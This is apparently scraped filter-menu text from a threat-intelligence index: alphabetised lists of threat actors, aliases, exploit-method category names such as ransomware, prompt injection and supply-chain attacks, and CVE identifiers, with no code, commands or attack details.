TAG-144 TAG-150 Taliban Team 64 Tejaskumar Patel TEMP.Hex Terrorist groups The threat actors from "Scattered Spider", "ShinyHunters", and "Lapsus" Telegram channel Third Party Data Transfer Threat actor modifying Zscaler binaries Threat actors behind Likejack campaign Transnational inheritance scam group in Côte d’Ivoire Trump Administration UAT-5918 UAT-7237 UK Home Office UNC5221 UNC5518 UNC5774 UNC6040 UNC6384 UNC6395 Unidentified Sitecore Attacker Unintentional insiders Unspecified Attacker USSR Vitaly Nikolaevich Kovalev Volt Typhoon Warlock WarLock Warlock Group Warlock Ransomware Gang Warlock ransomware group Weight-loss Scammers ZombAIs
Actor Aliases All @qwerty @v4bel 0ktapus 7777 Agenda AguilaCiega ak47c2 ak47dns ak47http Akira Anthony Ramirez APT-C-36 APT-Q-98 APT43 AsyncRAT Beijing Berserk Bear Bitcoin Trader Black Lock Blacklock Blind Eagle Blue Kraken Bossnet Broomstick/Oyster Burunduki Cl0p Claude Code ClickFix Contagious Interview cluster ContagiousDrop applications Conti spin-off CowBot Cozy Bear CP3O CP3O LLC Crouching Yeti cryptohan Cyber Av3ngers data thieves Digital defenders of Pakistan Dragonfly EDRKillShifter El Dorado Eleven Eleven Botnet Elijah Energetic Bear Facebook FakeUpdates FBR FinFisher Flax Typhoon Flyservers S.A. FreeVPN.one GFW GhostWriter Global Group government goons Graphite GrayAlpha Great Firewall of China Gustavo Fring Haise Immediate Mator IntelBroker IsDLEnabledinAD Jodie JPush Kaleidoscope KaWaLocker King Bob Koala Team Lalartu LameHug Lampion Latrodectus Lumma Stealer LunaSpy Matryoshka MedusaLocker Midnight Blizzard MintsLoader Muddled Libra MultiMillionaire LLC Murky Panda Mustang Panda MysterySnail RAT NetSupport NEW VISION MARKETING LLC Nova Orange Perplexity-User PerplexityBot Pompompurin PRC PyNightshade Qilin ransomware gang Quantum Bumex R-FBI Rabotnik Ramp cybercrime forum account ransomware gang Rapper Bot RapperBot RealBlindingEDR Redline/Meta Stealer remi Royal Russian Federal Security Service’s (FSB) Center 16 unit Russian hackers Scatter Swine Scattered Lapsus$ Hunters Scattered Spider ScatteredLapsuSp1d3rHunters SectopRAT ShinyHunters Silk Typhoon Slaykings SocGholish malware Sosa SoundBill SparkCat Spider Team Static Tundra Storm-0978 Storm-1679 Storm-2603 TheTruthSpy Third Party Attacker Tropical Scorpius Trump admin UAC-0057 UNC2596 UNC3944 UNC6395 Universal Mining UNK_GreenSec UNKN ValleyRAT Volt Typhoon Winos World Leaks XORacle Xworm Yemen Cyber Army Zephyr Zunput
Exploit Method All .ICS-based calendar phishing 5G to 4G Downgrade Attack ABAP Code Injection ABAP_Code_Injection_via_RFC ABF_Heap_Overflow ABF_Heap_Overflow_2 Abuse of Android Permissions for Data Exfiltration and Control Abuse of Censys Research Program to Identify Vulnerable Systems Abuse of gpscript.exe Abuse of HRSword Abuse of Legitimate Internet Services (LIS) for Staging Abuse of Legitimate Tools (Velociraptor, Visual Studio Code) for Remote Access Abuse of Remote Access Tools (AnyDesk, TightVNC, RDP Wrapper) Abuse of Velociraptor Incident Response Tool for Remote Access Accidental Data Deletion via Third-Party Access Accidental Data Exposure via Search Engine Indexing Account Compromise via Stolen Credentials Account Hijacking via Telegram Premium Gift Scam Account Password Reset Account Takeover Account Takeover via Stolen Credentials Admin Panel Access and Data Exfiltration ADP Region Bypass Adversarial Reward Hacking Adversary-in-the-Middle (AitM) Attack AF_VSOCK UAF exploit (CVE-2024-50264) AF_VSOCK Use-After-Free Exploit Agent Memory Poisoning AgentHopper AI Agent Credential Exposure AI Agent Privileged Data Access AI Agent Vulnerability AI Browser Prompt Injection AI ClickFix AI Crawler Overload AI Girlfriend Data Theft AI Kill Chain AI Model Hallucination Leading to Incorrect Employee Mapping AI Poisoning (LLM Grooming) AI-Assisted Data Extortion AI-assisted Reconnaissance and Target Selection AI-assisted Vibe Hacking AI-Augmented Mutational Fuzzing AI-based Age Detection for Data Collection AI-Driven Exploitation AI-Enhanced Attack Automation AI-enhanced Malware Development AI-Fueled Data Exfiltration via Automated Agents AI-powered Phishing and Social Engineering AI-Powered Ransomware (PromptLock) AI-Powered Ransomware Generation (Ransomware 3.0) AI-Powered Real-time Threat Detection Circumvented by Adding Cyber Later Airtel Router Default Password Exploitation Allianz Life Customer Info Breach Alone Theme Webshell Upload AMOS Infostealer 
Installation via Terminal Command AMOS Persistence Mechanism via LaunchDaemon Amplification of Unconfirmed Cyberattack Claims and Deprecated API Exploitation and Registry/Disk Search Android VPN App Security Flaws and China Links Anonymity Exploitation for Malware Distribution and Financial Fraud ANSI Escape Code Injection Anti-Competitive Ad Practices/Self-Preferencing API-Targeted Attacks Apple ID Scam Leading to Theft APT31 Campaign Arbitrary Code Execution via Indirect Prompt Injection by Adding Malicious MCP Servers Arbitrary Code Execution via Indirect Prompt Injection by Allowlisting Bash Commands Arbitrary Code Execution via Prompt Injection with 'find -exec' Arbitrary Command Execution via Allowlisted Commands Arbitrary Command Execution via Malicious MCP Server Addition Arbitrary File Write via Hard Link and Symlink Arbitrary Firmware Flashing via Web Portal Arbitrary Free via Forged Session ASP.NET Machine Key Deserialization RCE Authenticated Remote Code Execution via SharePoint Automated CVE-2018-0171 Exploitation Automated Dependency Updates Automated Negotiation Automatic Tool Invocation via Prompt Injection AV-killer malware abusing ThrottleStop.sys AVideo_Race_Condition_and_Blacklist_Chain AWS Trusted Advisor Flaw Backdoor Backdoor Creation Backdoor Injection and Model Poisoning BadBazaar BadCam BadPotato BadUSB Baltimore Procurement Scam Beyond Compare Clipboard Injection BitChat Vulnerabilities BlackCat Ransomware Blind In/On-Path Attack Blind Signing Blind-signing risks Blocking Rival Advertising Companies Bomb Threats & Swatting Broken Windows Reset/Recovery Brushing Scam Brushing Scam leading to data exfiltration/malware installation Brute Force Activity BruteForceAI Business Email Compromise (BEC) Business Logic Abuse (BOLA) Business Logic Flaws in Referral Rewards Programs Bybit Hack - Compromised Supply Chain & Unverified Signatures Leading to Delegate Call Manipulation BYOVD (Bring Your Own Vulnerable Driver) 
BYOVD_Arbitrary_Process_Termination Bypassing Gatekeeper via Terminal-Based Installation Bypassing_Windows_Hello_Fingerprint_Login C# Random Number Generator Integer Underflow C# Random Number Generator Predictability C4 (Chrome Cookie Cipher Cracker) Cable-cutting techniques (anchor dragging) Caller ID Spoofing by Overseas Robocallers Car Unlocking Exploit Chained RCE (E3) Check Kiting/Tap-In Scam Circumventing Antitrust Regulations Cisco Bug Exploitation Citrix Vulnerability Exploitation Claude AI Chatbot Cybercrime Cleartext Authentication Exploit ClickFix ClickFix Phishing ClickFix Social Engineering Clickjacking Client-side blind in/on-path attacks for connection inference Client-Side Path Traversal (CSPT) Leading to XSS or CSRF Client-Side Posture Check Bypass via Binary Patching Clipboard Address Replacement Clipboard Address Swapping via Malware (Efimer) Cloud Misconfiguration Exploitation Cloud Resource Abuse for Cryptojacking Cloud Trusted-Relationship Compromise CM/ECF Cyberattack Cobalt_Strike_Post_Exploitation Colonial Pipeline Hack COM Hijacking via Registry Key Command Injection in SynologyPhotos Command Injection via Improper Sanitization Command Line Obfuscation Compromise M-of-N multisig keys Compromised Certificate Usage Compromised CI/CD Pipelines Compromised Delegated Administrative Privileges (DAP) Compromised Employee Accounts Compromised Nx Package Maintainer Token Compromised OAuth Token Exploitation Compromised Passwords Compromised SaaS Application Registration Secret Compromised Third-Party Applications Compromising Smartphones for User Data Configuration File Manipulation for Unauthorized Access Configuration File Modification for Unauthorized Access Conflicting Privileges/Separation of Duties Violation Confusing Firewall Management ConnectWise Server Vulnerability Context Poisoning (Echo Chamber technique) Control Plane Disruption Leading to Security Enforcement Failure Cookie Injection leading to Cookie Tossing Cookie Misuse and 
Non-Compliance Copilot Agent Prompt Injection via GitHub Issues Copyright Infringement for Illicit Streaming CORS Bypass via Simple Request Manipulation CosMc's Promotional Coupon Exploit Covert Command & Control via Web Conferencing Traffic Cozy Bear's use of NSO Group and others' surveillanceware flaws Cracked Remote Access Trojans (RATs) Credential Abuse Credential Dumping Credential Dumping via Mimikatz Credential Extraction via Mimikatz Credential Harvesting & Data Theft Credential Harvesting from Exfiltrated Data Credential Phishing via Impersonation Credential Pointer Overwrite Attacks Credential Scanning Post Data Exfiltration Credential Stealing with AI Assistance Credential Stuffing via Bots Credential Stuffing/Compromise Credential Stuffing/Reused Credentials Credential Theft leading to Document Access Credential Theft via Mimikatz Cross-Server Manipulation (Confused Deputy) Cross-Server Tool Shadowing Cross-site request forgery (CSRF/XSRF) Cross-site scripting (XSS) Cross-Site Scripting (XSS) for Auth Token Acquisition Cryptocurrency Mining Centers (Illicit) Cryptocurrency Mining Exploitation Cryptocurrency Scam Recovery Fraud Cryptocurrency Wallet Seed Phrase Phishing Custom Code Injection/Tech Debt in Legacy IGA CVE-2025-57789 and CVE-2025-57790 CWE Exploitation Cyber Privateers Cyberattacks on critical systems impacting US military operations Cyberbullying Cycle Exploitation Danabot DarkLnk Data Access via Government Request (Cloud Act) Data Access via Investment Data Breach Data Breach of Order Management System Data Breach Through Mishandled User Data Data Breach/Leak Data Breaches of Stored Information Data Broker Breach Leading to Identity Theft Data Collection and Potential Misuse Data Collection for Targeted Advertising via Browser Ownership Data Collection of Underage YouTube Users Data Corruption/SSD Failure Data Deletion Data Deletion and Privilege Escalation Attempts Data Exfiltration Data Exfiltration and Auction Data Exfiltration and 
System Downtime Data Exfiltration from iiNet Order Creation and Tracking System Data Exfiltration via `read_url_content` Tool Data Exfiltration via Browsing Tool Data Exfiltration via Browsing Untrusted Domains Data Exfiltration via Image Rendering Data Exfiltration via Markdown Image Rendering Data Exfiltration via Mermaid Diagrams Data Exfiltration via SOQL Queries Data Exposure due to Misconfiguration Data Exposure via Unauthenticated API Access Data Extortion Data Injection Attacks Data Leakage Data Leakage via Prompt Injection and Shared Trust Boundary Data Leakage via Shadow AI Data Overload and Latency Exploitation Data Scraping for AI Training Data Set Manipulation via Face Morphing Data Sharing with Third Parties Data Sovereignty and Potential Breaches Data Theft leading to Phishing/Fraud Data Theft via Canadian House of Commons Breach Data Transfer Commands for Exfiltration Data_Sharing_Vulnerability_Through_Public_Services_Team DataExfiltration DDoS Attacks Enabled by Stark Industries Infrastructure DDoS Botnet leveraging compromised IoT devices Decoy Domain Detection Deepfake Nudes Deepfake Social Engineering Deepfake-Based BEC Deepfake-Enabled Social Engineering for Investment Fraud Deepfakes and Spoofing Age Verification Systems Deepfakes for Disinformation Delivery of Malicious ZIP Archive via Herokuapp DELMIA Apriso Deserialization Exploit Demographic Bias in Facial Recognition Deserialization of Untrusted Input leading to Arbitrary Code Execution Destination Hijacking and Storage Limit Oracle Side-Channel Attack Directory Access Bypass via Improper Path Validation Dirty Pipe exploit Dirty Pipe Exploit (CVE-2022-0847) adaptation for CVE-2024-50264 Distributed Denial of Service (DDoS) Attack DLL Hijacking DLL Search Order Hijacking DLL Side-Loading DNS Data Exfiltration via Prompt Injection DNS Hijacking DNS PTR Record Hijacking DNS Tunneling Domain Generation Algorithms (DGA) Downgrade Attack Doxing Doxing and Harassment of Election Officials Doxing 
and Stalking DripDropper Malware Deployment Drive-by Download via AI Manipulation Dumping unfiltered streams leading to errors Eavesdropping and Recording of Conversations Echo Chamber with Narrative Steering EchoLeak ECScape: ECS Task Credential Theft via ECS Agent Impersonation EDR Killer Tool EDRKillShifter and Vulnerable Driver Exploitation (BYOVD) Efimer WordPress Password Cracking EfsPotato EfsPotato and BadPotato EfsPotato/BadPotato Elasticsearch Instance Reconnaissance Email Spoofing Emergency_Access_Authentication_Bypass EMF_Out_of_Bounds_Read Emotional Dependency Entra OAuth Misconfiguration for Internal Microsoft Application Access Equation Editor Exploit ERMAC_v3_Source_Code_Leak Erosion of Cybersecurity Expertise at the State Department Evasive Trade Patterns and Shell Companies Excessive Permissions and Dormant Accounts of Machine Identities Execute PE From PNG Via LNK Execution of Arbitrary Commands and Code via WMI Tooling Exfiltrating Stored User Memories via Prompt Injection Exploitation of Bugs Dating Back to 2020 Exploitation of known vulnerabilities for initial access Exploitation of Public Wi-Fi Exploiting Known Vulnerabilities for Initial Access Exploiting known vulnerabilities on unpatched servers Exploiting Outdated Software Exposed High Voltage Components Exposed_Infrastructure_Abuse Exposure of Secrets via Public Repositories Extended Security Updates Costs Face Morphing Identity Fraud Facebook Likejacking via Trojan.JS.Likejack Facial Recognition Misidentification due to Low Image Quality Facial_Recognition_Scan_of_Passport_and_Immigration_Databases Fake Cryptocurrency Investments Fake Tesla Website Credit Card Theft FakeCaptcha Faulty OAuth Implementation in Staff Portals Feel-Good Design Hub Account Creation Exploit find -exec Arbitrary Command Execution Forged Documents for Disinformation Fortinet SSL VPN Brute-Force Free Food Exploit FreePBX Remote Code Execution Fuzzing for Memory Errors GDI+ Metafile Attack (CVE-2025-53766) 
Geolocation Tracking via Third-Party SDK GitHub Account Compromise GitHub Actions Workflow Code Injection Global Restaurant Standards Portal Admin Authorization Exploit Google Classroom Phishing Campaign GoPhish_Phishing GPS Jamming GPS Spoofing Gravity Forms Malware Injection Grok Conversation Exposure via Search Engines Grooming in Online Games GTM Container Chaining for E-skimming GUI Port Scanning and Configuration Hijacking Gzip Reverse Shell Hard-coded Shadowsocks Password Decryption Hard-coded Shadowsocks password leading to traffic decryption Hardcoded AES Key for Password Reset Harmful content Harvesting Credentials via Snooping Software Hashtag Hijacking Heap Corruption/Use-After-Free via Arbitrary Free Heap_Corruption_via_Forged_Session_Object Heap-based Buffer Overflow in Nex Parsing HexStrike AI Assisted Exploit Generation for NetScaler Vulnerabilities Hidden Personal Data in Spreadsheets HMRC Impersonation and Phishing for Identity Theft Hotel Booking System Infiltration and Data Theft HTTP Chunked Encoding Stack Overflow HTTP Chunked Transfer Encoding Memory Corruption in NVIDIA Triton HTTP Host Header Authentication Bypass HTTP Request Smuggling via Chunk Extension Parsing HTTP Request Smuggling via HTTP/1.1 Desync HTTP/2 Rapid Reset Hyper-V Certificate Spoofing (CVE-2025-49707) Hyper-V VM Escape (CVE-2025-48807) iCloud Calendar Invite Phishing iCloud Calendar Phishing Image Scaling Attack for Multi-Modal Prompt Injection Image Scaling Attack Leading to Indirect Prompt Injection Image-Based Device Hijacking Impersonation-as-a-Service Incompatibility across integrated systems Incorrect array index bounds check via KUBSAN Increased Foreign Surveillance Indirect Prompt Injection leading to Data Exfiltration via Shell Tool Indirect Prompt Injection Leading to Devbox Compromise Indirect Prompt Injection Leading to Port Exposure Indirect Prompt Injection leading to Remote Code Execution Information Hoarding Infrastructure Scouting and OPSEC Failures 
Inheritance Scam Inheritance Scams Initial Intrusion Insecure AWS Bucket Access Insecure Cross-Site Worklet Code Leaking Shared Storage Data Insecure Deserialization for Command Execution Insecure_C2_Infrastructure Insecure-by-Design Notification System Insider Sabotage via Code Modification Insider Threats Integer Overflow in FTS5 Extension integer overflows via ACL Integer Truncation Leading to Heap-Buffer-Overflow Intent Redirection Interlock Ransomware Attack Internet-Facing Appliance Exploitation Invisible Unicode Tag Character Prompt Injection Invisible Unicode Tag Prompt Injection Invisible_Prompt_Injection_via_Unicode_Tag_Characters Jailbreaking and Content Abuse Jenkins Git Parameter Plugin Command Injection JPEG Image Attack (CVE-2025-50165) JPEG Image Processing Attack JPEG2000 cdef atom Overflow JSCEAL JuicyPotato Privilege Escalation JWT Leakage to User-Built Apps Kaleidoscope Ad Fraud Campaign Kaseya Supply Chain Attack Kawa4096 Ransomware Arbitrary Command Execution Kawa4096 Ransomware Data Deletion Kerberoasting Kill Switch Kill Switch via Active Directory Account Disablement Kimsuky APT Group using Spear-phishing L1TF Reloaded Lack of AI Usage Policies and Training Lack of Controls Over Downloads Lack of Multi-Factor Authentication (MFA) Lack_of_MFA_Pre_Enforcement LameHug Lateral Movement to Other Dealer Systems Lateral Movement via RDP using SoftEther VPN client Lazarus APT Watering Hole Attack Lazarus APT Watering Hole Attacks on South Korean Software Leaky Debugging Reports Bypassing Referrer-Policy and CSP Legal Uncertainty Leading to Reduced Threat Information Sharing LegalPwn Lethal Trifecta Exploitation Librarian Ghouls APT Malicious RAR Archives and BAT Scripts Librarian Ghouls APT RAR and BAT script attack Limited Targeted Exploitation of CVE-2025-38352 and CVE-2025-48543 Linux Malware Delivery via Spam Email LLM Answer Manipulation LLM Data Theft via Malicious Prompts Location Data Aggregation and Sale Location Tracking by Untrusted 
Contacts Login Bypass and Privilege Escalation LummaC2 Infostealer LummaStealer LZ1 vulnerability M365 Copilot File Access Without Audit Logs M365 Copilot Jailbreak via Caret Characters MadeYouReset MagicBell API Key Exposure Mailchimp Phishing for Subscriber Data Theft Mains Voltage Leakage Malicious App Distribution via Google Play Malicious Archive Exploitation Malicious Browser Extension as Spyware Malicious GitHub Repositories Malicious Image Processing for Memory Corruption Malicious Java Thread Exhaustion Malicious Java Thread Loop Malicious OAuth App Connection Malicious OAuth Application Infiltration Malicious Post-Installation Script (telemetry.js) Malicious PowerShell Script with Base64 Encoding Malicious Tool Injection Malicious USB Drives (Hardware Wallet Seed Phrase Theft) Malvertising campaign Malvertising Campaign Distributing Trojanized PuTTY Malware Detection using YARA Malware-laced Recruitment Lures (Contagious Interview Campaign) Man-in-the-Middle Attack Man-in-the-Middle Phishing for MFA Tokens Manual Package Dependency Manipulation Markdown Image Rendering Data Exfiltration Marshal Deserialization Exploit in Rails Controller MAS Hijacking Mass Internet Scanning MCPoison Memory or Credential Dumping Meta AI Conversation Exposure Metasploit_Exploitation MFA Bombing MFA Fatigue Attack Microsoft SharePoint 'ToolShell' vulnerability exploit chain Microsoft SRS Abuse Mirai-based DDoS Botnet Misconfigurations Misconfigured Security Tools Misidentification and False Accusations via Facial Recognition Misuse of Vulnerability Disclosure MixShell Custom In-Memory Implant Model Extraction Attacks Money Muling Money Muling via Social Media Motors Theme Admin Account Hijacking MOVEit Transfer mass exploitation by Clop ransomware MSMQ Packet Attack (CVE-2025-50177) NDI Streaming Performance Degradation Network Service Discovery NFC Relay Fraud (via SuperCard X) No-Code Automation Platforms for BEC NodeSnake Remote Access Trojan Nomani Trojan Campaign NPM 
Package Infostealer NPM Supply Chain Attack via GitHub Actions Workflow NULL_Pointer_Dereference_in_elastic-endpoint-driver.sys NVIDIA Triton Unauthenticated Takeover OAuth Account Takeover via URL Leak OAuth Credential Theft and Abuse OAuth Token Theft OAuth Token Theft via Salesloft Drift Integration OAuth Token Theft/Abuse Obfuscation of Cryptocurrency Transactions OCI Image Archive Bomb Office Preview Pane RCE Olivia AI Chatbot Default Password Exploit Online Scams Online Scams (Investment Fraud) Open Directory Listing Open Redirect Leading to Account Takeover Out-of-bounds Read in EMF Processing Out-of-bounds Write via Crafted ControlVault API Call Overreliance on Vendors and Frameworks Packet Injection Parallel Poisoned Web Attack Parsing Untrusted Files Patch_Bypass_via_Signature_Manipulation Path Traversal PayPal Account Secondary User Addition Penetration Testing PerfektBlue Bluetooth Attack Phishing Phishing and Online Dating Scams Phishing and Social Engineering Phishing and Social Engineering using Generative AI Phishing Attack via Unfiltered Links Phishing Campaign Targeting UK Home Office SMS Phishing Campaign with MostereRAT Phishing Email Attachment Phishing for Device Codes Phishing Link Click Phishing via Mailto Links Phishing via Netflix Impersonation Phishing via SMS (Smishing) Phishing via Telegraph Tool Phishing-as-a-Service via Telegram Bots Physical Access Bypass of Windows Login Physical Access to Voting Machines Poisoned Web Pages Targeting AI Agents Poorly Configured Cloud Services Post-Compromise Persistence via Firmware Implant Post-Exploitation Patching PostgreSQL Database Corruption Potential Admin Panel Access Potential Backdoors PowerSchool Credential Interception PowerShell 2.0 Dependency PowerShell Invoke-Expression (IEX) abuse Powershell Script Execution from Non-Standard Directory Predictable Session IDs Prison visitor details shared with all inmates at correctional facility Privacy Issues Privilege Escalation Attempt Privilege 
Escalation using JuicyPotato Privilege Escalation via JuicyPotato Privilege Escalation via TrustedInstaller Mimicry Prompt Injection Prompt Injection for Data Harvesting Prompt Injection for Ransomware Assistance Prompt Injection Leading to Data Exfiltration via Image Rendering Prompt Injection leading to Data Theft Prompt Injection leading to DNS Exfiltration Prompt Injection leading to RCE via Settings Modification Prompt Injection leading to Remote Code Execution Prompt Injection Leading to Remote Command & Control Prompt Injection via Image Rendering for Data Exfiltration Prompt Injection via Tool Definitions Prompt Injection via url_safe bypass Prompt Injection/Egress Control Vulnerability in AI-Assisted Training Tools PromptFix Qilin Fortinet Vulnerability Exploitation Qilin Ransomware QR Code Phishing/Malware Distribution QR Code Scams Quad7 Botnet Quantum Computer Encryption Breaking QUIC-LEAK Pre-Handshake Memory Exhaustion Quishing (QR Phishing) Race Condition Exploitation via Single-Packet Attack RADIUS Authentication Command Injection (CVE-2025-20265) RAID Failure leading to Data Loss RAM Disk Buffer Overflow via HTTP PUT Request RansomHub Ransomware Ransomware Ransomware and Data Exfiltration Ransomware attack Ransomware Attack Ransomware Attack (Qilin) Ransomware Attack on Payment Processing Systems Ransomware Attack with LockBit and Babuk Variants Ransomware Deployment and Extortion Ransomware Deployment via SharePoint Vulnerability Ransomware Deployment via SonicWall Firewall Exploitation Ransomware Enabled by Cryptocurrency Exchange Ransomware Extortion of Downstream Customers Ransomware Targeting Git Repositories via Exposed Credentials RansomwareAttack Rapper Bot DDoS Attack Rapper Bot DDoS Botnet RCE via Crafted Metafile in GDI+ RCE via Malicious JPEG in Office Document RDP Exposure RDP Phishing RealBlindingEDR Customization and Abuse Rebranding and Infrastructure Reallocation to Evade Sanctions Red Teaming Evasion (prompt injection) 
Redline/Meta Stealer Referral Hijacking via Cookie Fixation Registry Run Key Persistence Remote Access Software Abuse Remote Code Execution via Prompt Injection and Chained Commands Remote Code Execution via SSH Command Injection Remote Kill Switch Remote Services (RDP, PsExec, PowerShell) Repository Credential Leakage via Project Details API Retbleed ReVault Exploit Revenge Porn RID Hijacking RobbinHood Ransomware Robot Control System Takeover Robots.txt Bypass via User-Agent Spoofing and IP Rotation robots.txt directive bypass Rogue Rogue Admin Account Creation Romance Scams and Business Email Compromises (BEC) Rootkit Detection Ruby Marshal Deserialization Exploits RustyClaw Downloader Execution SaaS Account Compromise via VPS SaaS Provider Account Takeover via CDK Bootstrap Roles Salesforce CRM OAuth Token Compromise Salesloft Drift Breach SAP NetWeaver Mass Exploitation Scam E-commerce Purchase Scams and Fraud via WhatsApp Screenshot Exfiltration Secure Call Fuzzing via SkBridge Secure Kernel Crash on Invalid Secure Call Operation Self-XSS via Disk Cache SEO Poisoning for LLMs SEO Poisoning/Click Reduction via AI Summarization Session Hijacking Session Hijacking via Session Sniffing Sextortion SHA-1 Collision Attack Shadow SharePoint Vulnerability Exploitation SharePoint Zero-Day Attack Spree SharePoint Zero-Day Exploits (July 2023) Shell on a system with command execution ShinyHunters Salesforce Attack Sideloaded Malware Distribution Silent Tool Redefinition Silver Fox APT Abusing Kernel Drivers SIM Swapping SimpleHelp Remote Administration Tool Attacks SimpleHelp Zero-Day RCE Sleepwalk Sliver_Post_Exploitation Smart Install Exploitation (CVE-2018-0171) Smart Install Message Crafted Attack SMS Bombing SMS Phishing SMS_Scams_via_Sentiment_and_Requests SMS_Scams_via_URL_Shorteners SNI5GECT Sniffing Attack SnipBot Variant Execution with Registry Check SNMP Exploitation in End-of-Life Devices Social Engineering Social Engineering (Vishing) Social Engineering and 
Grooming of Children Social Engineering and Redirection to Malicious Domains Social Engineering for Money Muling Social Engineering leading to Account Takeover and Data Theft Social Engineering of Salesforce Users via Malicious OAuth Apps Social Engineering Scams Social Engineering via AI Mimicry Social Engineering via AI Phishing Social Engineering via Contact Form Social Engineering via Hyperlinks and Invisible Unicode Characters Social Engineering via Messenger for Malware Distribution Social Engineering via SMS Phishing and In-Person Collection Social Engineering/Misinformation Campaign Social Media Phishing via Deepfakes and Impersonation Social Media Scams SoftEther_Proxy Software Supply Chain Attacks SpAIware Exploit SpAIware_Windsurf_Cascade Spearphishing with compromised email accounts Spearphishing with LNK file and PowerShell to deliver XenoRAT Speculative ROP SQL Injection SQL Injection & Rogue Admin User Creation SSH Exposure sshd Configuration Modification for Root Login SSL VPN MFA Bypass/Credential Theft ssp_dump_lsass Stack_Overflow_in_securebio_identify Stack-Based Buffer Overflow in MFER Parsing Stalkerware Data Exposure Stalking Startup Application Overload Static Tundra APT Group Exploiting Cisco IOS Stealing Developer Secrets via Prompt Injection and Grep Steganography to Embed Payloads in Image Files Stolen Account Credentials Stolen Credentials leading to Data Breach Stolen Credentials leading to Salesforce Data Breach Stored XSS on app.base44.com Leading to Account Takeover Subscription Traps Supply Chain Attack Supply Chain Attack (SolarWinds) Supply Chain Attack via Compromised GitHub Action Workflow Supply Chain Attack via Compromised npm Package Supply Chain Attacks Supply Chain Compromise Supply chain compromise of multisig provider Supply Chain Compromises Supply Chain Infiltration/Trade Secret Theft/Sabotage SVG Image with Embedded Javascript Execution SVG Phishing Campaign Delivering Malware SYNful Knock SYNful Knock Firmware 
Implant System Instability Post Windows 11 Migration SYSTEM_Privilege_Escalation_via_Firmware_Modification TarFile.extractall()/extract() filter bypass via hard link manipulation Targeted Assassination via Publicly Available Data TCP RST+ACK Packet Injection Tea Dating App Private Message Disclosure Telecom Infrastructure Compromise via Widespread Vulnerabilities Third-Party Application Exploitation Third-Party Data Breach Third-Party Integration Vulnerability (Salesloft/Drift Breach) Third-Party Service Access via Connectors Third-party Software Package Compromise Third-Party Vendor Exploitation Threatening Communication Timed Clickjacking Exploit Tizen OS Vulnerabilities tj-actions/changed-files Supply Chain Breach TLS Downgrade via STARTTLS Token Theft Tool Poisoning via Hidden Instructions in Tool Descriptions ToolShell Exploit Chain (SharePoint Servers) TP-Link Botnet Infection Trade-Based Money Laundering Traffic Distribution System (TDS) Misuse Transient execution vulnerability Trolling Trusted Advisor Bypass via Policy Manipulation Tuya App Notification Exploit TypeLib Hijacking Persistence Technique Typosquatting/Tool Impersonation Unauthenticated File Operations (E2) Unauthenticated RCE via CVE-2025-57788 Unauthenticated RCE via CVE-2025-57791 and CVE-2025-57790 Unauthenticated Remote Code Execution via Metadata Uploader Endpoint Unauthenticated Remote Command Injection Unauthenticated Server-Side Template Injection Unauthorized Malicious Activity Unauthorized Model Access and Resource Exhaustion Unauthorized Network Access Uninitialized function pointer call in JPEG decoding Uninitialized Pointer Memory Corruption via Malicious PDF Unintentional Data Exposure Through Shared Chats Unintentional Insider Data Leakage via Public AI Tools Universal RCE Deserialization Gadget Chain Unoptimized Code Flow Causing Connection Error Unpatched data accessibility flaw Unpatched OS Vulnerability Exploitation Unreliable Network Share Backup Unsecured Public Wi-Fi 
Unspecified Cyber Incident URL Anchor Hijacking USB-based Malware Distribution Use of customized shellcode loader SoundBill Use of Generative AI for Disinformation Use of Remote Access Software User-Agent Spoofing UXSS via redirectUrl parameter in GX.games V8 Heap Snapshot Backdoor Valid Code Signing Certificate Abuse VBScript obfuscation in Javascript view_text_website Tool Data Exfiltration ViewState Deserialization ViewState Deserialization Attack ViewState Deserialization via Exposed Machine Key VIN-Based Account Takeover and Remote Vehicle Control Violation of Cookie Regulations and Unconsented Ad Display Violence and Fraud via Telegram VIPKeylogger Voice Phishing Vulnerability Scanning for Exploitation Watering Hole Attack Weakening Encryption Web Application Attacks Web Defacement Web Desync Attacks Webshell Implant Webshell implantation on SharePoint servers Website Defacement WhatsApp Targeted Attack Windows 10 End-of-Life Migration Windows Administrator Password Cracking Windows CLFS Vulnerability Exploitation Windows Update Failure from Network Share WinRAR ADS Path Traversal WinRAR Path Traversal Exploit via Malicious Archives WinRAR vulnerability exploitation WordPress Website Compromise Wrong Recipient Email WSUS Update Failure XSS via file:// URL and SpectreJS XZ-Utils Backdoor YouTube Impersonation for Channel Takeover YubiKey Cloning Zelle Fraud Due to Insufficient Security Measures Zero-Click Attack via Chained Vulnerabilities Zero-Click Image Processing Zero-Click WhatsApp Exploit Zero-day exploitation Zero-Day Exploitation Zero-Day Vulnerability Exploitation Zero-day vulnerability exploitation by surveillanceware vendors ZipLine Phishing Campaign ZombAI Zombie
Vulnerabilities All CVD-2024-0096 CVE-2017-11882 CVE-2018-0171 CVE-2018-20835 CVE-2019-5420 CVE-2021-26708 CVE-2022-3875 CVE-2022-3876 CVE-2023-3519 CVE-2023-36884 CVE-2023-46604 CVE-2023-48788 CVE-2023-50224 CVE-2023-NNNNN CVE-2024-12905 CVE-2024-2088 CVE-2024-23692 CVE-2024-26980 CVE-2024-3094 CVE-2024-34102 CVE-2024-38196 CVE-2024-39337 CVE-2024-40766 CVE-2024-45431 CVE-2024-45432 CVE-2024-45433 CVE-2024-45434 CVE-2024-47575 CVE-2024-49039 CVE-2024-50264 CVE-2024-50283 CVE-2024-50285 CVE-2024-50286 CVE-2024-50623 CVE-2024-55956 CVE-2024-9680 CVE-2025-0282 CVE-2025-053 CVE-2025-20265 CVE-2025-20281 CVE-2025-20282 CVE-2025-20337 CVE-2025-21450 CVE-2025-21479 CVE-2025-21483 CVE-2025-21944 CVE-2025-21945 CVE-2025-21946 CVE-2025-21947 CVE-2025-21955 CVE-2025-21967 CVE-2025-22038 CVE-2025-22039 CVE-2025-22041 CVE-2025-22042 CVE-2025-22043 CVE-2025-22074 CVE-2025-22457 CVE-2025-23310 CVE-2025-23311 CVE-2025-24000 CVE-2025-24204 CVE-2025-24311 CVE-2025-24322 CVE-2025-24485 CVE-2025-24496 CVE-2025-24813 CVE-2025-24919 CVE-2025-24922 CVE-2025-25050 CVE-2025-25214 CVE-2025-25215 CVE-2025-25256 CVE-2025-26469 CVE-2025-27034 CVE-2025-27129 CVE-2025-27564 CVE-2025-27724 CVE-2025-27931 CVE-2025-30256 CVE-2025-30388 CVE-2025-31143 CVE-2025-31324 CVE-2025-31355 CVE-2025-31646 CVE-2025-32010 CVE-2025-32433 CVE-2025-32451 CVE-2025-32468 CVE-2025-32731 CVE-2025-35984 CVE-2025-36548 